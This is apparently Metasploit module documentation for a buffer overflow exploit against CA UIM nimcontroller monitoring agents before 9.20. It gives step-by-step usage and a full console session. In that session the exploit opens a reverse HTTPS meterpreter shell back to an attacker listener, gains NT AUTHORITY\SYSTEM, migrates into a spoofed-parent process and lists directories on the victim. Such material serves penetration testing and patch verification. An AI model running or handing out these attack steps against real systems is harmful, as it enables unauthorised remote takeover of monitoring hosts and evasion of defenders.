4.4 KiB
4.4 KiB
Vulnerable Application
All CA Infrastructure Management monitoring agents prior to 9.20 are vulnerable to a buffer overflow vulnerability within the nimcontroller when using the directory_list probe. Since the directory_list probe requires read privileges the target host must also be vulnerable to CVE-2020-8010 to bypass ACL settings. Successful code execution will result in a NT AUTHORITY\SYSTEM shell, even if exploitation fails the remote service will not crash. You should be able to exploit the service an unlimited amount of times.
Verification Steps
- Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
- Start
msfconsole - Do
use exploit/windows/nimsoft/nimcontroller_bof - Do
set RHOSTS <ip> - Do
exploit - Verify shell is opened and service is still accessible
Links
Options
Scenarios
Windows 10 x64
msf5 exploit(windows/nimsoft/nimcontroller_bof) > options
Module options (exploit/windows/nimsoft/nimcontroller_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
DIRECTORY C:\ no Directory path to obtain a listing
RHOSTS W.X.Y.Z yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 48000 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST A.B.C.D yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Windows Universal (x64) - v7.80.3132
msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit
[*] Started HTTPS reverse handler on https://A.B.C.D:8443
[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe
Directory of C:\
12/15/2019 06:24 PM <DIR> $GetCurrent
12/14/2019 01:41 AM <DIR> $Recycle.Bin
10/18/2019 05:55 PM <DIR> Documents and Settings
07/21/2020 10:15 AM <DIR> pagefile.sys
07/14/2020 03:41 PM <DIR> PerfLogs
06/10/2020 09:18 AM <DIR> Program Files
07/19/2020 01:37 PM <DIR> Program Files (x86)
07/14/2020 03:41 PM <DIR> ProgramData
12/15/2019 07:08 PM <DIR> Recovery
07/21/2020 10:15 AM <DIR> swapfile.sys
10/18/2019 04:04 PM <DIR> System Volume Information
12/15/2019 07:09 PM <DIR> Users
07/18/2020 02:20 PM <DIR> Windows
[+] W.X.Y.Z:48000 - The target is vulnerable.
meterpreter >
[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DESKTOP-JICNNRT
[*] Current server process: notepad.exe (1860)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 7472
[+] Successfully migrated into process 7472
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
DIRECTORY => C:\Users\
msf5 exploit(windows/nimsoft/nimcontroller_bof) > check
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe
Directory of C:\Users\
03/19/2019 12:02 AM <DIR> All Users
12/15/2019 07:14 PM <DIR> Default
03/19/2019 12:02 AM <DIR> Default User
03/18/2019 11:49 PM <DIR> desktop.ini
07/19/2020 01:37 PM <DIR> REDACTED
12/15/2019 09:07 PM <DIR> Public
[+] W.X.Y.Z:48000 - The target is vulnerable.